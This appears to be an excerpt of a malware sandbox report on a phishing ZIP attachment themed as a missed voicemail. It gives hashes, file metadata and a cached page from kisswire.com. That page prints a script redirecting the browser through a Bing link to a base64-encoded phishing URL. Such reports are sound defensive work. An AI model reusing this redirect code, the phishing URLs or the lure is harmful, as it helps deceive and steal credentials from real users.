                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null

                    Chrome Cache Entry: 98

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:HTML document, ASCII text, with no line terminators
                    Category:downloaded
                    Size (bytes):206
                    Entropy (8bit):5.573141902577794
                    Encrypted:false
                    SSDEEP:
                    MD5:EBE3A619969A0A3F1702E229568DEE85
                    SHA1:0111D18EFB5F9D084C3BF5653FD13181061F562D
                    SHA-256:F9DD76372877E955AC5595686962F7D958CF0E55C7DA6F0AA84394EBE0141710
                    SHA-512:66D2A0759396FFDBF3261181CDEE2552B23712E81E2774A7B9D9883F6090D723A0F41D2D548D4464F5D08923F53287E1A53C6B99D6A83D797C53DD452071F572
                    Malicious:false
                    Reputation:unknown
                    URL:https://kisswire.com/fthjx.php
                    Preview:<script>window.top.location.href = "https://r.g.bing.com/bam/ac?!&&u=a1aHR0cHM6Ly9ramhnZmRmY2h2YmpuamtsaGdmcXdycXdycXc1MzQ1MzUyMzIzNS5wYWdlcy5kZXYvI0hhMkZ5Wlc0dVluVnlZMmhBZG05emMyeHZhQzVqYjIwPQ==";</script>

                    Static File Info

                    General

                    File type:Zip archive data, at least v4.5 to extract, compression method=deflate
                    Entropy (8bit):7.987375667584123
                    TrID:
                    • ZIP compressed archive (8000/1) 100.00%
                    File name:You_missed_a_VM _Transcription_Available_Play_Now.zip
                    File size:20'685 bytes
                    MD5:221f7e9438c2f8c1ba887734276da8b8
                    SHA1:3068c66307ea34c3368385b346c18b1d3853f649
                    SHA256:e8afbd2ef4b53ba9de32e9ba6193ebd4adbb160145d5c58c6ff5a0d7bbc19b67
                    SHA512:3b26356c3dea72c04e5c10763d9eb3b9c85da6ed4859cf41af3fe0d446ee21d38daa1c9f26bea1f917127352f99d94a0e8c218d7f836438c818f0cb4d02eb256
                    SSDEEP:384:Au1HTfhcy4vwSWUUpRDt1tEZRCtMFVya5Kh6jjeGo1kx3:AOHTfhcybhpVt1tMCtXnc5oi3
                    TLSH:5192C001FCBEC27BF84D33B5859E3869092D7C3886D609153329F8A856EB15C986F537
                    File Content Preview:PK..-......N.Y...P........M...dedc83fb-bb86-46ba-eb0a-08dcb6f9d89e/0487740a-25b6-b501-5a7a-7d2325a24229.eml.............O............fL..?.v...2.........m!........U5'KS....$W8t)../....X..Y>.t..O'...I..B.!0......^..'.'...-Wy.5<....&./..}WGZ..E.6p...[d..{..

                    File Icon

                    Icon Hash:1c1c1e4e4ececedc